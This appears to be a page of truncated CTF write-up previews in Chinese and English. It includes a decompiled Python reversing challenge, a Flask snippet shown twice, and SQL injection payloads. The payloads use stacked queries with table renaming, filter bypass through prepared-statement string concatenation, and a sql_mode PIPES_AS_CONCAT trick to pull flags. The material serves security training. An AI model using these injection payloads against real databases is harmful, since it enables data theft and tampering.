# uncompyle6 version 3.7.4# Python bytecode 2.7 (62211)# Decompiled from: Python 3.7.8 (tags/v3.7.8:4b47a5b6ba, Jun 28 2020, 08:53:46) [MSC v.1916 64 bit (AMD64)]# Embedded file name: encode.py# Compiled at: 2019-08-19 21:01:57print'Welcome to Re World!'print'Your input1 is your flag~'l=len(input1)foriinrange(l):num=((i...
NewpasswordForm from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep from io import BytesIO from code import get_verify_code @app.route('/code') def get_code(): image, code = get_verify_code() # 图片以二进制形式写入 buf = BytesIO() image.save(buf, 'jpeg') buf_str =...
1' ; rename tables `words` to `word`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100) ; # 再用1' or 1='1拿到flag 方法二:预编译 -1';set @sql = CONCAT('se','lect*from`1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;# ...
1、堆叠注入 2、逻辑select $_POST[query] || flag from flag 预期解:通过堆叠注入,设置sql_mode的值为PIPES_AS_CONCAT,从而将||视为字符串的连接操作符而不是或运算符。所以payload为:1;set sql_mode=PIPES_AS_CONCAT;select 1 非预期解select *,1 || flag from flag ...
NewpasswordForm from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep from io import BytesIO from code import get_verify_code @app.route('/code') def get_code(): image, code = get_verify_code() # 图片以二进制形式写入 buf = BytesIO() image.save(buf, 'jpeg') buf_str =...